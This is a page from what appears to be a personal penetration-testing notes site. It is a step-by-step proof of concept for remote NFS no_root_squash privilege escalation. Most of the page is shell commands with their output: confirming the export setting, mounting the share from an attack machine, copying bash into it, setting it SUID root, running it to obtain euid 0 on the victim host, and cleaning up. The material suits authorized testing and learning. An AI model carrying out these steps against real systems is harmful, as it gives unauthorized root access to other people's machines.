0xPThree.gitbook.io
  • Network Services
    • Ports
      • 21 - FTP
      • 22 - SSH
      • 23 - Telnet
      • 25, 465, 587 - SMTP(S)
      • 53 - DNS
      • 80, 443 - HTTP(S)
        • Frameworks
          • Drupal
          • Flask
          • Laravel
          • Tomcat
          • Werkzeug
        • Fuzzing
        • Grafana
        • Languages
          • PHP
        • WebDAV
        • Web Vulnerabilities
          • CloudFlare Bypass
          • Command Injection
          • CSTI
          • File Inclusion/Path Traversal
          • SQL Injection
          • SSI
          • SSTI
          • Upload bypass
          • XLST
          • XML Injection
      • 88 - Kerberos
      • 135, 593 - MSRPC
      • 139, 445 - SMB
      • 161, 162, 10161, 10162 - SNMP
      • 1433, 3306 - SQL
      • 2049 - NFS
      • 2375 - Docker
  • Active Directory
    • ADCS
    • DACL Abuse
      • AddMember
      • ForceChangePassword
      • Kerberoasting
      • ReadLAPSPassword
      • ReadGMSAPassword
      • Grant Ownership
      • Grant Rights
      • Logon Script
      • Rights on RODC object
    • Security groups
    • Misc
  • Coding Languages
    • Python
  • Exploits / PoC's
    • Ansible
      • Ansible AWX
    • Apache
      • HTTP Server - CVE-2021-41773
      • Struts - CVE-2024-53677 / S2-067
      • Tomcat - CVE-2020-1938 / CVE-2020-10487
      • Tomcat - CVE-2025-24813
    • Confluence - CVE-2023-22527
    • CUPS - CVE-2024-47***
    • D-Link
      • CVE-2020-29322
      • Decrypt firmware: DIR-X1560
    • Dmidecode - CVE-2023-30630
    • Erlang
      • OTP SSH - CVE-2025-32433
    • EternalBlue - MS17-010
    • Gitlab - CVE-2023-7028
    • Ivanti - CVE-2024-21893 / 21887
    • Jenkins - CVE-2024-23897
    • LXD group - N/A
    • nf_tables - CVE-2024-1086
    • NFS - N/A
    • Oracle
      • WebLogic - CVE-2018-2628
      • WebLogic - CVE-2019-2729
      • WebLogic - CVE-2023-21839
      • WebLogic - CVE-2024-20931
      • WebLogic - CVE-2024-21006
    • PHP
      • CVE-2024-4577
    • RunC
      • CVE-2022-0811
      • CVE-2024-21626
    • Snap - CVE-2019-7304
    • TP-Link - CVE-2024-5035
  • Hardware
    • Firmware
    • JTAG
    • SPI
    • UART
    • USB
  • Post Exploit
    • Compile payload
    • Obfuscation
    • Read VMDK files
    • Saved Credentials
      • Linux - Ansible AWX / Tower
      • Linux - Dell Networker
      • Windows - Mozilla Firefox
      • Windows - Notepad++
      • Windows - WinSCP
    • Session Hijack
    • Sniffing Passwords
    • Upgrade shell
    • VMware
      • Disk Encryption
      • LDAP Connection (SSO)
      • Restore VCSA Postgres Database
      • vCenter Forge SAML
      • Waiter Account Information
  • Development
    • Dnsmasq DHCP
    • Docker
      • Ansible AWX
      • Docker Compose
      • FirmAE - Emulate Firmware
      • Oracle WebLogic
      • Rocket.Chat
      • Tomcat
      • Vaultwarden
    • Harden Windows Host
    • HTTPS Proxy
    • Netplan + Networkd
    • SSL/TLS Certificates
  • TODO
Powered by GitBook
On this page

Was this helpful?

  1. Exploits / PoC's

NFS - N/A

no_root_squash privilege escalation (remote)

By default, NFS shares change requests from the root user into the non-privileged user nfsnobody, the root privileges are "squashed". With no_root_squash configured requests are not "squashed", meaning any client that mount this directory can read, write and modify files within the directory as root on the host machine.

This is the remote version of this privilege escalation, meaning there is no explicit host configured in /etc/exports, all (*) hosts are allowed to mount the nfs share.

## Confirm that 'no_root_squash' is configured
[lowPrivUser@victimHost nfs]$ cat /etc/exports
/share/nfs	*(rw,insecure,sync,no_subtree_check,no_root_squash)

## Low privileged account isn't able to read nfs directory
[lowPrivUser@victimHost share]$ ls -al
drwxr-xr-x   7 root     root        75 Jun 23 08:56 .
dr-xr-xr-x. 20 root     root       278 Aug 25  2022 ..
drwxr-x---   2 admUser  admUser    189 Feb 19  2021 nfs

## Mount share from local attack machine
➜  /tmp mkdir pe
➜  /tmp mount -t nfs victimHost:/share/nfs /tmp/pe
➜  /tmp cd pe
➜  pe ls -al 
total 5684
drwxr-x---  2 void void     189 Feb 19  2021 .
drwxrwxrwt 21 root root   69632 Jul  3 12:49 ..
-rw-r--r--  1 void void     823 Feb 19  2021 secret.conf

## Change privileges of mounted share so lowPrivUser can copy /bin/bash to share
➜  /tmp chmod 777 pe

[lowPrivUser@victimHost share]$ cd nfs
[lowPrivUser@victimHost nfs]$ cp /bin/bash .

## Change owner and set SUID bit on binary. Execute on victimHost to priesc
➜  pe chmod +s bash
➜  pe chown root:root bash

[lowPrivUser@victimHost nfs]$ ./bash -p
bash-4.4# id
uid=1651499380(lowPrivUser) gid=1102800513(domain users) euid=0(root) egid=0(root) groups=0(root)

## Cleaning
➜  pe rm bash
➜  pe cd ..
➜  /tmp chmod 750 pe
💀➜  /tmp umount pe

Last updated 10 months ago

Was this helpful?